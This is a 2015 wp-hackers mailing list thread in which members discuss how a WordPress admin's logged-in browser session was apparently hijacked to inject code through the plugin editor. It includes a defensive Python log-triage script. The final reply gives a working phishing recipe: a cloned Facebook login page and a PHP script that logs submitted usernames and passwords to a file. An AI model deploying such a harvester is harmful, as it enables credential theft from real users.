Viruses that look for open WordPress tabs in your browser?


Viruses that look for open WordPress tabs in your browser?

David Anderson-29
Has anyone come across the following before? Or is it potentially a new
thing? (I've not read any such thing before).

I'm examining a hacked WP site. The logs show that the site owner, the
sole admin, was logged in, and working on it in wp-admin in a normal
way, up until 02:52 on a certain day. Then absolutely nothing until
03:35. Then at 03:35, wham - a single GET followed by a load of POST
requests to the plugin editor, one for each plugin, inserting hacker
code. All from the admin's IP/browser (same user agent), and too close
together to be human (i.e. obviously scripted). It's all the same IP and
browser session, which is confirmed as the site owner's ISP.

My inference from that is that the site owner, at 02:52, went to do
other things, leaving the browser tab open. They got infected with a
virus (or perhaps already were), and that virus hunted for open browser
sessions logged-in to wp-admin, and used those sessions to infect the WP
site.

That's all technically do-able. But I've not previously heard of a virus
(the customer has a Mac, and was using Safari), that does this. Is this
a new thing?

David

--
UpdraftPlus - best WordPress backups - http://updraftplus.com
WordShell - WordPress fast from the CLI - http://wordshell.net

_______________________________________________
wp-hackers mailing list
[hidden email]
http://lists.automattic.com/mailman/listinfo/wp-hackers
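A triage check for the log pattern David describes (a quiet gap, then a scripted burst of POSTs to the plugin editor from the admin's own IP and user agent), added here as an example and not part of the thread. It assumes combined-format web server access logs; the log lines and the 203.0.113.5 address are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed combined-format access-log lines (not from the thread); 203.0.113.5 stands in for the admin's ISP IP.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2015:02:50:11 +0000] "GET /wp-admin/edit.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (Macintosh) Safari"
203.0.113.5 - - [10/Dec/2015:02:52:03 +0000] "POST /wp-admin/post.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Macintosh) Safari"
203.0.113.5 - - [10/Dec/2015:03:35:00 +0000] "GET /wp-admin/plugin-editor.php?file=a.php HTTP/1.1" 200 8891 "-" "Mozilla/5.0 (Macintosh) Safari"
203.0.113.5 - - [10/Dec/2015:03:35:01 +0000] "POST /wp-admin/plugin-editor.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Macintosh) Safari"
203.0.113.5 - - [10/Dec/2015:03:35:01 +0000] "POST /wp-admin/plugin-editor.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Macintosh) Safari"
203.0.113.5 - - [10/Dec/2015:03:35:02 +0000] "POST /wp-admin/plugin-editor.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Macintosh) Safari"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" \d+ \S+ "[^"]*" "([^"]*)"')
EDITORS = ("/wp-admin/plugin-editor.php", "/wp-admin/theme-editor.php")

def parse(log_text):
    """Yield (time, ip, user_agent, method, path) for each well-formed line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, ts, method, target, ua = m.groups()
        yield datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), ip, ua, method, target.split("?", 1)[0]

def find_editor_bursts(log_text, min_posts=3, window_s=10, idle_s=1800):
    """Flag sessions (IP + user agent) that POST to the plugin/theme editor min_posts
    times within window_s seconds, and report how long the session sat idle beforehand."""
    per_session = defaultdict(list)
    for rec in parse(log_text):
        per_session[(rec[1], rec[2])].append(rec)
    findings = []
    for (ip, ua), recs in per_session.items():
        recs.sort(key=lambda r: r[0])
        posts = [r[0] for r in recs if r[3] == "POST" and r[4] in EDITORS]
        for i in range(len(posts) - min_posts + 1):
            span = (posts[i + min_posts - 1] - posts[i]).total_seconds()
            if span > window_s:
                continue
            first = posts[i]
            # Idle time = gap since the session last touched anything other than an editor page.
            earlier = [r[0] for r in recs if r[0] < first and r[4] not in EDITORS]
            idle = (first - max(earlier)).total_seconds() if earlier else None
            findings.append({"ip": ip, "ua": ua, "first_post": first.isoformat(),
                             "span_s": span, "idle_before_s": idle,
                             "idle_then_burst": idle is not None and idle >= idle_s})
            break  # one finding per session is enough for triage
    return findings
```

A hit with a large idle_before_s and a one-second span from the admin's own session is the case to escalate; a human editing plugins by hand would not produce three saves in a second.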

Re: Viruses that look for open WordPress tabs in your browser?

J.D. Grimes
I'm not an expert, but I've never heard of anything like that before. Isn't it possible that the connection was compromised and an attacker was listening in on the user, then stole their session and spoofed the user agent?

-J.D.

> On Dec 10, 2015, at 7:03 PM, David Anderson <[hidden email]> wrote:


Re: Viruses that look for open WordPress tabs in your browser?

Scott Herbert (via Phone)
I think Zeus (whose source code was leaked online) did a similar
thing with banking sites, but that was on a PC. OSX (iirc) makes it
much harder to snag the browser's memory space, but nothing is impossible.

On 11 December 2015 at 13:08, J.D. Grimes <[hidden email]> wrote:

--
Scott Herbert
Web:  http://www.Scott-Herbert.com/
Twitter: http://twitter.com/Scott_Herbert
Linkedin: http://www.linkedin.com/in/scottaherbert

Re: Viruses that look for open WordPress tabs in your browser?

Mark Slade
I am aware of a few ways this could have gone:

   - Compromised browser -- the victim's browser was compromised and
   malicious code is driving their browser to perform the attacks.  The
   browser automatically includes auth cookies and the attack succeeds.
   - Compromised OS -- the victim's device was compromised through the OS
   or some shady software they installed.  At this point the virus doesn't
   need to peek into the browser's memory space, it just needs to drive the
   browser the way a regular user would -- simulating mouse clicks, etc.  WP
   trusts the browser so anything done by the browser will be trusted as
   well.  I'm not too familiar with this kind of attack so I'm not sure what
   OSes have what protections against this kind of thing, but I wouldn't rule
   it out.
   - Compromised network -- the victim's auth cookie was intercepted and
   the attacker just used that cookie from their own device to hijack the auth
   session.  For this to be the case, the attacker would've also needed to
   spoof the victim's IP since that's what was in the logs.  This is usually
   harder to pull off, but if the attacker is on the same LAN as the victim
   then it becomes a lot easier.  If the victim connects to WordPress over
   plaintext HTTP then this attack would be extremely easy to execute and it
   could appear to come from the same IP as the victim.

Mark

On Fri, Dec 11, 2015 at 8:45 AM, Scott Herbert <
[hidden email]> wrote:

Re: Viruses that look for open WordPress tabs in your browser?

DaveB722
In reply to this post by David Anderson-29
I don't know of anything in the wild for OS X that would execute this behavior. Sounds like either the site or the server was already compromised.

Re: Viruses that look for open WordPress tabs in your browser?

J G
In reply to this post by David Anderson-29
I know that I tested this on my own facebook account and it did work; it deals with GET and POST commands. Copy and paste the source from the facebook.com login (first page), change action= to GET, save the manipulated source code as index.php, FTP it to your own web server and save log.txt in the same root folder with the log reading

    <?php
    // Send the visitor on to the real site, then append every submitted query parameter to a file.
    header("Location: http://www.facebook.com/home.php? ");
    $handle = fopen("passwords.txt", "a");
    foreach ($_GET as $variable => $value) {
        fwrite($handle, $variable);
        fwrite($handle, "=");
        fwrite($handle, $value);
        fwrite($handle, "\r\n");
    }
    fwrite($handle, "\r\n");
    fclose($handle);
    exit;
    ?>

A new file would be created within the same folder as index.php, log.txt, and it would display Username and Password. I imagine by doing this very similar phishing attack one could gain access to a wp-admin account? Correct me please if I am on a completely different subject; it just seemed familiar. This attack no longer works for facebook.

> To: [hidden email]
> From: [hidden email]
> Date: Fri, 11 Dec 2015 00:03:46 +0000
> Subject: [wp-hackers] Viruses that look for open WordPress tabs in your browser?